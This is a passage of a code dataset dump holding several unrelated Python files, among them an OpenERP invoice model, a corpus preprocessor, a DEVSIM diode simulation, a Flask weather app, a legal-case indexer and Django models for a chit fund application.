See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n###############################################################################\nfrom openerp.osv import fields, osv\n\nfrom openerp.addons.decimal_precision import decimal_precision as dp\n\n\nclass inherited_invoice(osv.Model):\n\n \"\"\"\n M321 Customizations for account.invoice model\n \"\"\"\n _inherit = \"account.invoice\"\n _columns = {\n 'profit_code': fields.integer(\"Code from profit\",\n help=\"Invoice code from profit\"),\n }\n\n\nclass inherited_invoice_line(osv.Model):\n _inherit = \"account.invoice.line\"\n _columns = {\n 'net_discount': fields.float('Net Discount', required=False,\n digits_compute=dp.get_precision('Account'),\n help=\"\"\"Loaded from data imported from Profit is equal to sale price\n minus real sold price\"\"\"),\n 'discount_code_profit': fields.char('Discount code from profit',\n size=7)\n }\n\n _defaults = {\n 'net_discount': 0.0\n }\n","sub_path":"m321_customization/invoice.py","file_name":"invoice.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"15612565","text":"\ndef calc_divisor(x):\n # O(sqrt(N))\n divisor = []\n for i in range(1, int(x ** 0.5) + 1):\n if x % i == 0:\n divisor.append(i)\n if i != x // i:\n divisor.append(x // i)\n return divisor\n\n\nN = int(input())\nprint(*sorted(calc_divisor(N)), sep=\"\\n\")\n","sub_path":"contest_src/abc180/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"64448882","text":"#!/usr/bin/env python3\n\"\"\"\nPreprocesses the specified corpus. Converters should be put into the\nemLam.corpus package. Currently, converters exist for the Szeged Treebank,\nWebcorpus and MNSZ2.\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\nfrom builtins import range\nfrom argparse import ArgumentParser, RawDescriptionHelpFormatter\nfrom functools import partial\nimport os\nimport os.path as op\nfrom queue import Empty\n\nfrom emLam.corpus import get_all_corpora, get_all_preprocessors\nfrom emLam.corpus.corpus_base import GoldCorpus\nfrom emLam.corpus.preprocessor_base import CopyPreprocessor\nfrom emLam.corpus.gold_to_raw import GoldToRaw\nfrom emLam.utils import run_queued, setup_queue_logger\nfrom emLam.utils.config import cascade_section, handle_errors, load_config\n\n\ndef usage_epilog(corpora, preprocessors):\n \"\"\"Describes the various Corpus and Preprocessor classes available.\"\"\"\n cformat = '{{:<{}}} - {{}}'.format(max(len(name) for name in corpora.keys()))\n pformat = '{{:<{}}} - {{}}'.format(max(len(name) for name in preprocessors.keys()))\n c = '\\nThe following corpora are available:\\n' + '\\n'.join(\n cformat.format(name, cls_path[0].description) for name, cls_path\n in corpora.items())\n p = '\\nThe following preprocessors are available:\\n' + '\\n'.join(\n pformat.format(name, cls_path[0].description) for name, cls_path\n in preprocessors.items())\n return c + '\\n' + p\n\n\ndef config_pp(config, warnings, errors, class_paths):\n \"\"\"\n Postprocessing function for the configuration: makes sure that it has\n sections for the selected corpus and preprocessor. 
Not all components have\n sections in the configuration; examples include the text corpus and the copy\n preprocessor. However, since properties are inherited from the ancestor\n classes, we need to know their full path later.\n \"\"\"\n for path in class_paths:\n cfg = config\n for section in path:\n cfg = cfg.setdefault(section, {})\n\n\ndef parse_arguments():\n corpora = get_all_corpora()\n preprocessors = get_all_preprocessors()\n\n parser = ArgumentParser(\n description='Preprocesses the specified corpus.',\n formatter_class=RawDescriptionHelpFormatter,\n epilog=usage_epilog(corpora, preprocessors))\n parser.add_argument('--source-dir', '-s', required=True,\n help='the source directory.')\n parser.add_argument('--target-dir', '-t', required=True,\n help='the target directory.')\n parser.add_argument('--corpus', '-c', required=True,\n choices=[c for c in corpora.keys()],\n help='the corpus to preprocess. See below for a '\n 'description of the available corpora.')\n parser.add_argument('--preprocessor', '-p', required=True,\n choices=[p for p in preprocessors.keys()],\n help='the preprocessor to use. See below for a '\n 'description of the available options.')\n parser.add_argument('--configuration', '-C', required=True,\n help='the configuration file.')\n parser.add_argument('--processes', '-P', type=int, default=1,\n help='the number of files to process parallelly.')\n parser.add_argument('--log-level', '-L', type=str, default=None,\n choices=['debug', 'info', 'warning', 'error', 'critical'],\n help='the logging level.')\n\n args = parser.parse_args()\n if args.source_dir == args.target_dir:\n parser.error('Source and target directories must differ.')\n\n args.corpus, corpus_path = corpora[args.corpus]\n args.preprocessor, preprocessor_path = preprocessors[args.preprocessor]\n if (\n issubclass(args.corpus, GoldCorpus) and\n args.preprocessor not in [CopyPreprocessor, GoldToRaw]\n ):\n parser.error(\"Gold standard corpora can only be used with the ``copy'' \"\n \"preprocessor.\")\n\n # Config file\n config, warnings, errors = load_config(\n args.configuration, 'preprocess_corpus.schema',\n retain=[args.corpus.name, args.preprocessor.name],\n postprocessing=partial(config_pp,\n class_paths=[corpus_path, preprocessor_path]))\n handle_errors(warnings, errors)\n\n return args, config\n\n\ndef walk_non_hidden(directory):\n \"\"\"Walks directory as os.walk, skipping hidden files and directories.\"\"\"\n def delete_hidden(lst):\n for i in range(len(lst) - 1, -1, -1):\n if lst[i][0] == '.':\n del lst[i]\n\n for tup in os.walk(directory):\n dirpath, dirnames, filenames = tup\n delete_hidden(dirnames)\n delete_hidden(filenames)\n yield tup\n\n\ndef source_target_file_list(source_dir, target_dir):\n source_dir = op.abspath(source_dir)\n target_dir = op.abspath(target_dir)\n source_files = [op.abspath(op.join(d, f))\n for d, _, fs in walk_non_hidden(source_dir) for f in fs]\n target_files = []\n for sf in source_files:\n sf_rel = sf[len(source_dir):].lstrip(os.sep)\n tf = op.join(target_dir, sf_rel)\n td = op.dirname(tf)\n if not op.isdir(td):\n os.makedirs(td)\n target_files.append(tf)\n return zip(source_files, target_files)\n\n\ndef process_file(components, queue, logging_level=None, logging_queue=None):\n corpus_cls, preprocessor_cls, pid, config = components\n # First set up the logger used by the corpus and the preprocessor\n logger = setup_queue_logger(logging_level, logging_queue)\n\n # Then we can instantiate the objects that do the actual work\n corpus = corpus_cls.instantiate(\n pid, 
**cascade_section(config, corpus_cls.name))\n logger.debug('Configuration: {}'.format(cascade_section(config, corpus_cls.name)))\n preprocessor = preprocessor_cls.instantiate(\n pid, **cascade_section(config, preprocessor_cls.name))\n preprocessor.initialize()\n try:\n while True:\n try:\n infile, outfile = queue.get_nowait()\n logger.info('Started processing {}'.format(infile))\n for ins, outs in corpus.files_to_streams(infile, outfile):\n preprocessor.preprocess(ins, outs)\n logger.info('Done processing {}'.format(infile))\n except Empty:\n logger.debug('Queue depleted.')\n break\n except:\n logger.exception('Exception in file {}'.format(\n infile))\n preprocessor.cleanup()\n preprocessor.initialize()\n except Exception as e:\n logger.exception('Unexpected exception')\n raise\n finally:\n preprocessor.cleanup()\n\n\ndef main():\n args, config = parse_arguments()\n os.nice(20) # Play nice\n\n components = [(args.corpus, args.preprocessor, p + 1, config)\n for p in range(args.processes)]\n source_target_files = source_target_file_list(args.source_dir, args.target_dir)\n\n run_queued(process_file, components,\n args.processes, source_target_files, args.log_level)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/preprocess_corpus.py","file_name":"preprocess_corpus.py","file_ext":"py","file_size_in_byte":7249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"553067048","text":"# Copyright 2016 Devsim LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom ds import *\nfrom simdir.physics.new_physics import *\nfrom simdir.physics.ramp2 import *\n\nimport numpy as np\n# import matplotlib\nimport matplotlib.pyplot\nfrom matplotlib import pyplot as plt\nimport ds\nECE_NAME = \"ElectronContinuityEquation\"\nHCE_NAME = \"HoleContinuityEquation\"\n#####\n# dio1\n#\n# Make doping a step function\n# print dat to text file for viewing in grace\n# verify currents analytically\n# in dio2 add recombination\n#\ndef get_ds_status():\n devices = ds.get_device_list()\n for device in devices:\n print(\"Device: \" + device)\n regions = ds.get_region_list(device=device)\n for region in regions:\n print(\"\\tRegion :\" + region)\n params = ds.get_parameter_list(device=device, region=region)\n for param in params:\n val = ds.get_parameter(device=device, region=region, name=param)\n print(f\"\\t\\t{param} = {val}\")\n n_models = ds.get_node_model_list(device=device, region=region)\n for node_model in n_models:\n nmvals = ds.get_node_model_values(device=device, region=region, name=node_model)\n print(f\"\\t\\t Node Model '{node_model}' = {nmvals!s}\")\n e_models = ds.get_edge_model_list(device=device, region=region)\n for edge_model in e_models:\n emvals = ds.get_edge_model_values(device=device, region=region, name=edge_model)\n print(f\"\\t\\t Edge Model '{edge_model}' = {emvals!s}\")\n contacts = ds.get_contact_list(device=device)\n for contact in contacts:\n print(\"\\tContact : \" + contact)\n c_eqs = 
ds.get_contact_equation_list(device=device, contact=contact)\n for ceq in c_eqs:\n print(\"\\t\\tContact Equation : \" + ceq)\n\n\ndef plot_charge(regions):\n fields = (\"Electrons\", \"Holes\", \"Donors\", \"Acceptors\")\n plt.figure()\n for var_name in fields:\n total_x = np.array([])\n total_y = []\n for region in regions:\n x = np.array(get_node_model_values(device=device, region=region, name=\"x\"))\n # print(var_name, min(x), max(x), min(x)*1e4, max(x)*1e4)\n total_x = np.append(total_x, x)\n y=get_node_model_values(device=device, region=region, name=var_name)\n total_y.extend(y)\n # plt.axis([min(x), max(x), ymin, ymax])\n plt.semilogy(np.array(total_x)*1e4, total_y)\n plt.xlabel('x (um)')\n plt.ylabel('Density (#/cm^3)')\n plt.legend(fields)\n # plt.savefig(\"diode_1d_density.png\")\n####\n#### Meshing\n####\ndef createMesh(device, region):\n create_1d_mesh(mesh=\"dio\")\n add_1d_mesh_line(mesh=\"dio\", pos=0, ps=5e-8, tag=\"top\")\n add_1d_mesh_line(mesh=\"dio\", pos=0.5e-5, ps=1e-9, tag=\"mid\")\n add_1d_mesh_line(mesh=\"dio\", pos=1e-5, ps=5e-8, tag=\"bot\")\n add_1d_contact (mesh=\"dio\", name=\"top\", tag=\"top\", material=\"metal\")\n add_1d_contact (mesh=\"dio\", name=\"bot\", tag=\"bot\", material=\"metal\")\n add_1d_region (mesh=\"dio\", material=\"Si\", region=region, tag1=\"top\", tag2=\"bot\")\n finalize_mesh(mesh=\"dio\")\n create_device(mesh=\"dio\", device=device)\n\ndevice=\"MyDevice\"\nregion=\"MyRegion\"\n\ncreateMesh(device, region)\n\n####\n#### Set parameters for 300 K\n####\nset_parameter(name=\"T\", value=300)\nSetSiliconParameters(device, region)\nset_parameter(device=device, region=region, name=\"taun\", value=1e-8)\nset_parameter(device=device, region=region, name=\"taup\", value=1e-8)\nset_parameter(device=device, region=region, name=\"n1\", value=1e10)\nset_parameter(device=device, region=region, name=\"p1\", value=1e10)\n\n\n####\n#### NetDoping\n####\nCreateNodeModel(device, region, \"Acceptors\", \"1.0e18*step(0.5e-5-x)\")\nCreateNodeModel(device, region, \"Donors\", \"1.0e18*step(x-0.5e-5)\")\nCreateNodeModel(device, region, \"NetDoping\", \"Donors-Acceptors\")\nprint_node_values(device=device, region=region, name=\"NetDoping\")\n\n####\n#### Create Potential, Potential@n0, Potential@n1\n####\nCreateSolution(device, region, \"Potential\")\n\n####\n#### Create potential only physical models\n####\nCreateSiliconPotentialOnly(device, region)\n\n####\n#### Set up the contacts applying a bias\n####\nfor i in get_contact_list(device=device):\n set_parameter(device=device, name=GetContactBiasName(i), value=0.0)\n CreateSiliconPotentialOnlyContact(device, region, i)\n\n\n####\n#### Initial DC solution\n####\nsolve(type=\"dc\", absolute_error=1.0e2, relative_error=1e-1, maximum_iterations=100, solver_type='iterative')\n\n####\n#### drift diffusion solution variables\n####\nCreateSolution(device, region, \"Electrons\")\nCreateSolution(device, region, \"Holes\")\n\nCreateEField(device, region)\nCreateDField(device, region)\nopts = CreateAroraMobilityLF(device, region)\nopts = CreateHFMobility(device, region, **opts)\n# CreateHFMobility(device, region, **opts)\n\nset_parameter(device=device, region=region, name=\"BETAN\", value=2.0)\nset_parameter(device=device, region=region, name=\"BETAP\", value=1.0)\nset_parameter(device=device, region=region, name=\"VSATN0\", value=2.4e7)\nset_parameter(device=device, region=region, name=\"VSATP0\", value=2.4e7)\nset_parameter(device=device, region=region, name=\"VSATN.A\", value=0.8)\nset_parameter(device=device, 
region=region, name=\"VSATP.A\", value=0.8)\n\n\n####\n#### create initial guess from dc only solution\n####\nset_node_values(device=device, region=region, name=\"Electrons\", init_from=\"IntrinsicElectrons\")\nset_node_values(device=device, region=region, name=\"Holes\", init_from=\"IntrinsicHoles\")\n\n# import physics.model_create\n#physics.model_create.debug=True\n###\n### Set up equations\n###\nCreateSiliconDriftDiffusion(device, region, **opts)\nfor i in get_contact_list(device=device):\n CreateSiliconDriftDiffusionContact(device, region, i, Jn=opts['Jn'], Jp=opts['Jp'])\n\n###\n### Drift diffusion simulation at equilibrium\n###\n# set_parameter(device=device, name=GetContactBiasName(\"bot\"), value=2.0)\nsolve(type=\"dc\", absolute_error=1e10, relative_error=1e-10, maximum_iterations=100)\nprint(\">>After Equil<<\")\n\nget_ds_status()\n####\n#### Ramp the bias to 0.5 Volts\n####\nvolts=[]\ncurrent=[]\nv = 0.0\nwhile v < 0.51:\n # plot_charge([region])\n set_parameter(device=device, name=GetContactBiasName(\"bot\"), value=v)\n set_parameter(device=device, name=GetContactBiasName(\"top\"), value=0.0)\n print(v)\n solve(type=\"dc\", absolute_error=1e6, relative_error=1e-12, maximum_iterations=300)\n # PrintCurrents(device, \"top\")\n # PrintCurrents(device, \"bot\")\n for contact in ds.get_contact_list(device=device):\n e_current = abs(ds.get_contact_current(device=device, contact=contact, equation=ECE_NAME))\n e_current += abs(ds.get_contact_current(device=device, contact=contact, equation=HCE_NAME))\n current.append(e_current)\n volts.append(v)\n v += 0.02\n# plt.show()\nplt.figure()\nplt.semilogy(volts, current)\nplt.figure()\nplt.plot(volts, current)\n # pydevsim.plot_charge(regions=regions)\n # pydevsim.plot_current(regions=regions)\nplt.show()\n\nwrite_devices(file=\"diode_1d.tec\", type=\"tecplot\")\n\nx=get_node_model_values(device=device, region=region, name=\"x\")\nymax = 10\nymin = 10\nfields = (\"Electrons\", \"Holes\", \"Donors\", \"Acceptors\")\nfor i in fields:\n y=get_node_model_values(device=device, region=region, name=i)\n if (max(y) > ymax):\n ymax = max(y)\n matplotlib.pyplot.semilogy(x, y)\nmatplotlib.pyplot.xlabel('x (cm)')\nmatplotlib.pyplot.ylabel('Density (#/cm^3)')\nmatplotlib.pyplot.legend(fields)\nymax *= 10\nmatplotlib.pyplot.axis([min(x), max(x), ymin, ymax])\nmatplotlib.pyplot.savefig(\"diode_1d_density.png\")\nmatplotlib.pyplot.show()\n\nmatplotlib.pyplot.clf()\nedge_average_model(device=device, region=region, node_model=\"x\", edge_model=\"xmid\")\nxmid=get_edge_model_values(device=device, region=region, name=\"xmid\")\n#efields = (\"Jn_arora_lf\", \"Jp_arora_lf\" )\n#efields = (\"Jn\", \"Jp\", \"Jn_arora_lf\", \"Jp_arora_lf\" )\nefields = (\"Jn\", \"Jp\")\ny=get_edge_model_values(device=device, region=region, name=efields[0])\nymin=min(y)\nymax=max(y)\nfor i in efields:\n y=get_edge_model_values(device=device, region=region, name=i)\n if min(y) < ymin:\n ymin = min(y)\n elif max(y) > ymax:\n ymax = max(y)\n matplotlib.pyplot.plot(xmid, y)\nmatplotlib.pyplot.xlabel('x (cm)')\nmatplotlib.pyplot.ylabel('J (A/cm^2)')\nmatplotlib.pyplot.legend(efields)\nmatplotlib.pyplot.axis([min(x), max(x), 0.5*ymin, 2*ymax])\nmatplotlib.pyplot.savefig(\"diode_1d_current.png\")\nmatplotlib.pyplot.show()\nprint (ymin)\nprint (ymax)\n\nmatplotlib.pyplot.clf()\nedge_average_model(device=device, region=region, node_model=\"x\", edge_model=\"xmid\")\nxmid=get_edge_model_values(device=device, region=region, name=\"xmid\")\nefields = (\"mu_arora_n_lf\", \"mu_arora_p_lf\", 
\"mu_n\", \"mu_p\", )\n#efields = (\"Jn\", \"Jp\", \"Jn_arora_lf\", \"Jp_arora_lf\" )\ny=get_edge_model_values(device=device, region=region, name=efields[0])\nymin=min(y)\nymax=max(y)\nfor i in efields:\n y=get_edge_model_values(device=device, region=region, name=i)\n if min(y) < ymin:\n ymin = min(y)\n elif max(y) > ymax:\n ymax = max(y)\n matplotlib.pyplot.plot(xmid, y)\nmatplotlib.pyplot.xlabel('x (cm)')\nmatplotlib.pyplot.ylabel('J (A/cm^2)')\nmatplotlib.pyplot.legend(efields)\nmatplotlib.pyplot.axis([min(x), max(x), 0.5*ymin, 2*ymax])\nmatplotlib.pyplot.savefig(\"diode_1d_mobility.png\")\nmatplotlib.pyplot.show()\nprint (ymin)\nprint (ymax)\n\n\n#x=get_node_model_values(device=device, region=region, name=\"x\")\nymax = 10\nymin = 10\nfields = (\"USRH\",)\nfor i in fields:\n y=get_node_model_values(device=device, region=region, name=i)\n if (max(y) > ymax):\n ymax = max(y)\n matplotlib.pyplot.semilogy(np.array(x)*10000, y)\nmatplotlib.pyplot.xlabel('x (nm)')\nmatplotlib.pyplot.ylabel('Density (#/cm^3)')\nmatplotlib.pyplot.legend(fields)\nymax *= 10\nmatplotlib.pyplot.axis([min(x)*10000, max(x)*10000, ymin, ymax])\nmatplotlib.pyplot.savefig(\"USRH.png\")\nmatplotlib.pyplot.show()\n","sub_path":"noclass/diode_1d.py","file_name":"diode_1d.py","file_ext":"py","file_size_in_byte":10289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"8731661","text":"from data_structures_and_algorithms.challenges.fizz_buzz_tree.fizz_buzz_tree import FizzBuzzTree,BinaryTree,Node\nimport pytest\n\ndef test_fizzbuzz_1(pre_data_1):\n \"\"\"\n test for fizz and buzz, if the data is numbers\n \"\"\"\n expected=['2', '4', 'Fizz', 'FizzBuzz', '7', 'Buzz', 'Fizz']\n actual =FizzBuzzTree(pre_data_1)\n assert expected==actual\n\n\ndef test_fizzbuzz_2(pre_data_2):\n \"\"\"\n test for fizz and buzz, if there is data that its non number\n \"\"\"\n expected=['2', '4', 'Fizz', 'B', 'A', 'FizzBuzz', 'm', 'Buzz', 'Fizz']\n actual =FizzBuzzTree(pre_data_2)\n assert expected==actual\n\ndef test_fizzbuzz_none(pre_data_2):\n \"\"\"\n test for fizz and buzz, if there is no data at all\n \"\"\"\n bt=BinaryTree()\n \n \n expected=[]\n actual =FizzBuzzTree(bt)\n assert expected==actual\n\n\n@pytest.fixture\ndef pre_data_1():\n bt=BinaryTree()\n bt.root=Node(2)\n bt.root.left=Node(4)\n bt.root.left.right=Node(30)\n bt.root.left.left=Node(12)\n bt.root.right=Node(7)\n bt.root.right.right=Node(18)\n bt.root.right.left=Node(10)\n return bt\n\n@pytest.fixture\ndef pre_data_2():\n bt=BinaryTree()\n bt.root=Node(2)\n bt.root.left=Node(4)\n bt.root.left.right=Node(30)\n bt.root.left.left=Node(12)\n bt.root.left.left.right=Node(\"A\")\n bt.root.left.left.left=Node(\"B\")\n bt.root.right=Node(\"m\")\n bt.root.right.right=Node(18)\n bt.root.right.left=Node(10)\n return bt\n\n\n","sub_path":"tests/challenges/test_k_ary_tree.py","file_name":"test_k_ary_tree.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"593190195","text":"from orator.migrations import Migration\n\n\nclass CreateTypeResourcesTable(Migration):\n\n def up(self):\n \"\"\"\n Run the migrations.\n \"\"\"\n with self.schema.create('tipoRecurso') as table:\n table.increments('idTipoRecurso')\n table.string('nombre', 250).unique()\n table.string('descripcion', 250)\n table.string('mensaje', 250)\n table.string('identificador', 250)\n\n def down(self):\n \"\"\"\n Revert the migrations.\n \"\"\"\n 
self.schema.drop('tipoRecurso')\n","sub_path":"migrations/2020_09_02_003049_create_type_resources_table.py","file_name":"2020_09_02_003049_create_type_resources_table.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"170480458","text":"from flask import Flask\nimport weather\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef hello_world():\n return 'Welcome to the weather machine! Try going to http://localhost/temperature/provo to see how it works!'\n\n\n@app.route('/temperature/')\ndef temperature(city):\n city_temp = weather.get_temperature_by_city(city)\n return f\"The temperature in {city} is {city_temp}\"\n\n\n@app.route('/temperature_c/')\ndef temperature_celsius(city):\n # filled missing parameter\n city_temp = weather.get_temperature_by_city(city)\n return f\"The temperature in {city} is {city_temp} ({weather.convert_fahrenheit_to_celsius(city_temp)} Celsius)\"\n\n\nif __name__ == '__main__':\n app.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"12684408","text":"#!/usr/bin/python3\nimport re\nfrom collections import defaultdict\n\nimport nltk\nimport sys\nimport getopt\nimport os\nimport csv\n\nimport util\nfrom dictionary import Dictionary\nfrom postingsfile import PostingsFile\nimport court \n\n\nmaxInt = sys.maxsize\nwhile True:\n try:\n csv.field_size_limit(maxInt)\n break\n except OverflowError:\n maxInt = int(maxInt/10)\n\n\ndef usage():\n print(\"usage: \" + sys.argv[0] + \" -i dataset-file -d dictionary-file -p postings-file\")\n\n\ndef process_csv(dataset_file, out_dict):\n \"\"\"\n Parses and processes the CSV data file to create the index and postings lists.\n\n Params:\n - dataset_file: Path to dataset\n - out_dict: Path to save dictionary to\n\n Returns:\n - dictionary: Dictionary containing index and postings\n \"\"\"\n dictionary = Dictionary(out_dict)\n\n with open(dataset_file, encoding=\"utf8\") as dataset_csv:\n i = 0\n prev_docId = 0\n\n csv_reader = csv.reader(dataset_csv)\n for row in csv_reader:\n i += 1\n\n # Skip CSV header\n if i == 1:\n continue\n\n docId = row[0]\n\n # Skip duplicate document IDs\n if prev_docId == docId:\n continue\n \n # For each document, get the content tokens and add it to the posting lists\n tokens = util.preprocess_content(row[1] + \" \" + row[2] + \" \" + row[3] + \" \" + row[4])\n normalised_tf = dictionary.add_tokens_of_doc(tokens, docId)\n\n # Maintain document lengths and count in dictionary\n dictionary.add_normalised_doc_length(docId, normalised_tf)\n dictionary.add_court_weight(docId, court.get_court_weight(row[4]))\n dictionary.add_doc_count()\n\n prev_docId = docId\n\n dataset_csv.close()\n\n return dictionary\n\n\ndef build_index(dataset_file, out_dict, out_postings):\n \"\"\"\n build index from documents stored in the dataset file,\n then output the dictionary file and postings file\n \"\"\"\n print('indexing...')\n\n postings_file = PostingsFile(out_postings)\n\n dictionary = process_csv(dataset_file, out_dict)\n\n # Save dictionary and postings lists to disk\n postings_file.save(dictionary)\n dictionary.save()\n\n\ndataset_file = output_file_dictionary = output_file_postings = None\n\ntry:\n opts, args = getopt.getopt(sys.argv[1:], 'i:d:p:')\nexcept getopt.GetoptError:\n usage()\n sys.exit(2)\n\nfor o, a in opts:\n if o == '-i': # dataset file\n dataset_file = a\n elif o == 
'-d': # dictionary file\n output_file_dictionary = a\n elif o == '-p': # postings file\n output_file_postings = a\n else:\n assert False, \"unhandled option\"\n\nif dataset_file == None or output_file_postings == None or output_file_dictionary == None:\n usage()\n sys.exit(2)\n\nbuild_index(dataset_file, output_file_dictionary, output_file_postings)\n","sub_path":"legal-case-retrieval/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"613161039","text":"import tkinter as tk\n\n# create the event handler to clear the text\ndef evClear():\n lHistory['text'] = eHello.get()\n eHello.delete(0, tk.END)\n\n# create the top level window/frame\ntop = tk.Tk()\nF = tk.Frame(top)\nF.pack(fill=\"both\")\n\n# Now the frame with text entry\nfEntry = tk.Frame(F, border=1)\neHello = tk.Entry(fEntry)\neHello.pack(side=\"left\")\nlHistory = tk.Label(fEntry, text=\" \", foreground=\"steelblue\")\nlHistory.pack(side=\"bottom\", fill=\"x\")\nfEntry.pack(side=\"top\")\n\n# Finally the frame with the buttons. \n# We'll sink this one for emphasis\nfButtons = tk.Frame(F, relief=\"sunken\", border=1)\nbClear = tk.Button(fButtons, text=\"Clear Text\", command=evClear)\nbClear.pack(side=\"left\", padx=5, pady=2)\nbQuit = tk.Button(fButtons, text=\"Quit\", command=F.quit)\nbQuit.pack(side=\"left\", padx=5, pady=2)\nfButtons.pack(side=\"top\", fill=\"x\")\n\n# Now run the eventloop\nF.mainloop()\n","sub_path":"source_code/python_projects/Chapter4/Tkinter/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"280460317","text":"from django.db import models,transaction\nfrom django.conf import settings\nfrom django.utils import timezone \nfrom datetime import datetime\n\nfrom django.contrib.auth.models import (\n AbstractBaseUser, PermissionsMixin, BaseUserManager\n)\n \nclass UserManager(BaseUserManager):\n \n def _create_user(self, name, password, **extra_fields):\n \"\"\"\n Creates and saves a User with the given email,and password.\n \"\"\"\n if not name:\n raise ValueError('The given email must be set')\n try:\n with transaction.atomic():\n user = self.model(name=name, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user\n except:\n raise\n \n def create_user(self, name, password=None, **extra_fields):\n extra_fields.setdefault('is_staff', False)\n extra_fields.setdefault('is_superuser', False)\n return self._create_user(name, password, **extra_fields)\n\n def create_superuser(self, name, password, **extra_fields):\n extra_fields.setdefault('is_staff', True)\n extra_fields.setdefault('is_superuser', True)\n \n return self._create_user(name, password=password, **extra_fields) \n\nclass User(AbstractBaseUser, PermissionsMixin):\n \"\"\"\n An abstract base class implementing a fully featured User model with\n admin-compliant permissions.\n \n \"\"\"\n # email = models.EmailField(max_length=40, blank=True, null=True)\n name = models.CharField(max_length=30, blank=True, unique=True)\n role = models.CharField(max_length=20, blank=True)\n phone_number = models.CharField(max_length=10,null=True) \n #last_name = models.CharField(max_length=30, blank=True)\n is_active = models.BooleanField(default=True)\n is_staff = models.BooleanField(default=False)\n date_joined = models.DateTimeField(default=timezone.now)\n \n objects = UserManager()\n \n 
USERNAME_FIELD = 'name'\n REQUIRED_FIELDS = ['role']\n \n def save(self, *args, **kwargs):\n super(User, self).save(*args, **kwargs)\n return self\n\n# Create your models here.\nclass Type(models.Model):\n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n color = models.CharField(max_length=10, default=\"\")\n status = models.IntegerField(default=1)\n published_date = models.DateTimeField(blank=True, null=True, default=timezone.now)\n\n def __str__(self):\n return self.name\n\nclass Chit(models.Model):\n id = models.AutoField(primary_key=True)\n amount = models.IntegerField()\n remarks = models.CharField(max_length=300, null=True)\n status = models.IntegerField(default=1)\n published_date = models.DateTimeField(blank=True, null=True, default=timezone.now)\n\n def __str__(self):\n s=str(self.amount)\n return s\n\nclass Group(models.Model):\n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100, unique=True)\n type_id = models.ForeignKey(Type, on_delete=models.CASCADE)\n remarks = models.CharField(max_length=300, null=True)\n chit_id = models.ForeignKey(Chit, on_delete=models.CASCADE)\n start_date = models.DateTimeField(default=datetime.now)\n status = models.IntegerField(default=1)\n published_date = models.DateTimeField(blank=True, null=True, default=timezone.now)\n\n def __str__(self):\n return self.name\n\nclass Members(models.Model):\n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100,unique=True)\n phone_number = models.CharField(max_length=10,null=True) \n note = models.CharField(max_length=300, null=True)\n status = models.IntegerField(default=1)\n published_date = models.DateTimeField(blank=True, null=True, default=timezone.now)\n\n def __str__(self):\n return self.name\n\nclass GroupMembers(models.Model):\n group_id = models.ForeignKey(Group, on_delete=models.CASCADE)\n member_id = models.ForeignKey(Members, on_delete=models.CASCADE)\n\n published_date = models.DateTimeField(blank=True, null=True, default=timezone.now)\n\n def __str__(self):\n s=str(self.group_id)\n return s\n\n\n# class Users(models.Model):\n# id = models.AutoField(primary_key=True)\n# name = models.CharField(max_length=100,unique=True)\n# phone_number = models.CharField(max_length=10,null=True) \n# role = models.CharField(max_length=100)\n# pin = models.CharField(max_length=4)\n# status = models.IntegerField(default=1)\n# published_date = models.DateTimeField(blank=True, null=True, default=timezone.now)\n\n# def __str__(self):\n# return self.name+\" - \"+self.role\n\nclass ExpenseCategory(models.Model):\n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100,unique=True)\n remarks = models.CharField(max_length=300,null=True)\n status = models.IntegerField(default=1)\n published_date = models.DateTimeField(blank=True, null=True, default=timezone.now)\n\n def __str__(self):\n return self.name\n\nclass Expense(models.Model):\n id = models.AutoField(primary_key=True)\n date = models.DateTimeField(blank=True, null=True, default=datetime.now)\n category_id = models.ForeignKey(ExpenseCategory, on_delete=models.CASCADE)\n amount = models.IntegerField()\n\n def __str__(self):\n s=str(self.amount)\n return s\n\nclass Transaction(models.Model):\n id = models.AutoField(primary_key=True)\n date = models.DateTimeField(blank=True, null=True)\n member_id = models.ForeignKey(Members, on_delete=models.CASCADE)\n amount = models.IntegerField()\n remarks = models.CharField(max_length=300,blank=True, null=True)\n 
